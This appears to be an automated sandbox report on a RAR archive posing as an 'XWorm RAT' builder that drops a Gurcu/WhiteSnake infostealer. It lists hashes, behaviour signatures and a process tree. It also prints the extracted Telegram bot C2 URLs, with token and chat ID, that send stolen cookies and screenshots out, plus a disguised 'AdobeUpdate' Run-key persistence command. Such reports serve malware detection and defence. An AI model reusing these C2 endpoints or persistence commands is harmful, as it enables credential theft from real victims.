Analysis

  • max time kernel
    299s
  • max time network
    300s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-12-2024 03:17

General

  • Target

    test.rar

  • Size

    32.3MB

  • MD5

    bcceba879a34e34021ec86985b256039

  • SHA1

    7948c9327d3f04da85a37c4d62ed2f8dfca56900

  • SHA256

    894569cf4554d6b78e4cadebef076ea4b8a51d58d7307244a5acabf3beafb697

  • SHA512

    845d10d3c002e198462a951e391b7cc00a790b0c7f339222b87e3df0418f7b8bae34688693b31c531f3f7138fd3620cd4ef37cc3a118d990f15116edf7e50b95

  • SSDEEP

    786432:Us6yVAZZQH0evs7z9kyVbOIuL0x4yI3mgz58pGoOAcHS:Uz+Y7z+yVi4qyItdgLH

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=2024893777&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendMessage?chat_id=2024893777

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/getUpdates?offset=-

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=2024893777&caption=%F0%9F%93%B8Screenshot%20take

Signatures

  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\test.rar"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:5016
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:1880
    • C:\Users\Admin\Desktop\XWorm RAT V2.1\XWorm RAT V2.1.exe
      "C:\Users\Admin\Desktop\XWorm RAT V2.1\XWorm RAT V2.1.exe"
      1⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2180
      • C:\Users\Admin\Desktop\XWorm RAT V2.1\Command Reciever.exe
        "C:\Users\Admin\Desktop\XWorm RAT V2.1\Command Reciever.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2900
      • C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe
        "C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2744
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpFB67.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpFB67.tmp.bat
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3684
          • C:\Windows\system32\chcp.com
            chcp 65001
            4⤵
              PID:464
            • C:\Windows\system32\tasklist.exe
              Tasklist /fi "PID eq 2744"
              4⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:2060
            • C:\Windows\system32\find.exe
              find ":"
              4⤵
                PID:2560
              • C:\Windows\system32\timeout.exe
                Timeout /T 1 /Nobreak
                4⤵
                • Delays execution with timeout.exe
                PID:736
              • C:\Users\Admin\AppData\Roaming\AdobeUpdater\conhost.exe
                "C:\Users\Admin\AppData\Roaming\AdobeUpdater\conhost.exe"
                4⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:3036
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AdobeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdater\conhost.exe /f
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4076
                  • C:\Windows\system32\reg.exe
                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AdobeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdater\conhost.exe /f
                    6⤵
                    • Adds Run key to start application
                    • Modifies registry key
                    PID:4552

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

          Filesize

          1.7MB

          MD5

          65ccd6ecb99899083d43f7c24eb8f869

          SHA1

          27037a9470cc5ed177c0b6688495f3a51996a023

          SHA256

          aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

          SHA512

          533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

        • C:\Users\Admin\AppData\Local\Temp\tmpFB67.tmp.bat

          Filesize

          269B

          MD5

          1d38f3b5ad28d5affdea286cea821ed3

          SHA1

          2d3c47fdc72fc18bb832f4c8f1c43b8eb12ce03c

          SHA256

          7561ef04329bfc33fac1f824e4e020f3c1d6c91f8108247b5839ca28874de566

          SHA512

          ab888b7b1132c46a063f447a24cf9f24aec5c4f2332a96d25c000f543788f1ecfa205f2612118202a0ee7330c31ffa9ca5d99f9c1c53c3baf93dd0ecf2a7b75f

        • C:\Users\Admin\Desktop\XWorm RAT V2.1\Command Reciever.exe

          Filesize

          6.5MB

          MD5

          a21db5b6e09c3ec82f048fd7f1c4bb3a

          SHA1

          e7ffb13176d60b79d0b3f60eaea641827f30df64

          SHA256

          67d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5

          SHA512

          7caab4f21c33ef90c1104aa7256504ee40ff0a36525b15eb3d48940862346ccf90a16eef87c06d79b0ffd920beb103ed380eae45df8c9286768890b15ed1067c

        • C:\Users\Admin\Desktop\XWorm RAT V2.1\Resource\data.dat

          Filesize

          5.6MB

          MD5

          d650ccbec4cef66b790c0adbd0c690ed

          SHA1

          7c5323641a28170edb3121d9ad15d7bf643d801d

          SHA256

          b8735a6c2caa10ed5e886a60be7f2a1edb55e5d26d60b24d24af5613a8a0e474

          SHA512

          332dc8e1b3952ac3b3fbcfdf1634eaf9720d6bd85e6a1f0baef0f095c97a98d288f301b774c4d041c45ea8ea5ed8e52e8d786a874b8d0ce41dd5dd25a961b535

        • C:\Users\Admin\Desktop\XWorm RAT V2.1\XWorm RAT V2.1.exe

          Filesize

          2.2MB

          MD5

          835f081566e31c989b525bccb943569c

          SHA1

          71d04e0a86ce9585e5b7a058beb0a43cf156a332

          SHA256

          ea9258e9975b8925a739066221d996aef19b4ef4f4c91524f82e39d403f25579

          SHA512

          9ec58f8c586ecf78ef8d75debc5dba58544558566423a634724bb5ab192aaf64f9ccbee9a5af48124a3366b2a7d24b4db71bb5743978201b881c08bad8f6fb0c

        • memory/2180-136-0x000000007519E000-0x000000007519F000-memory.dmp

          Filesize

          4KB

        • memory/2180-137-0x00000000008D0000-0x0000000000B12000-memory.dmp

          Filesize

          2.3MB

        • memory/2180-138-0x0000000005A90000-0x0000000006034000-memory.dmp

          Filesize

          5.6MB

        • memory/2744-162-0x0000023E54620000-0x0000023E5462A000-memory.dmp

          Filesize

          40KB

        • memory/2744-161-0x0000023E3BE20000-0x0000023E3BE3E000-memory.dmp

          Filesize

          120KB

        • memory/2744-160-0x0000023E546F0000-0x0000023E54766000-memory.dmp

          Filesize

          472KB

        • memory/2744-154-0x0000023E39C70000-0x0000023E3A212000-memory.dmp

          Filesize

          5.6MB

        • memory/3036-173-0x0000021CEF810000-0x0000021CEF87A000-memory.dmp

          Filesize

          424KB

        • memory/3036-175-0x0000021CEF880000-0x0000021CEF932000-memory.dmp

          Filesize

          712KB

        • memory/3036-176-0x0000021CEF930000-0x0000021CEF980000-memory.dmp

          Filesize

          320KB

        • memory/3036-177-0x0000021CEEC60000-0x0000021CEEC82000-memory.dmp

          Filesize

          136KB

        • memory/3036-179-0x0000021CF07C0000-0x0000021CF07FA000-memory.dmp

          Filesize

          232KB

        • memory/3036-180-0x0000021CF0780000-0x0000021CF07A6000-memory.dmp

          Filesize

          152KB

        • memory/3036-181-0x0000021CF0800000-0x0000021CF0B2E000-memory.dmp

          Filesize

          3.2MB

        • memory/3036-200-0x0000021CF0B50000-0x0000021CF0B62000-memory.dmp

          Filesize

          72KB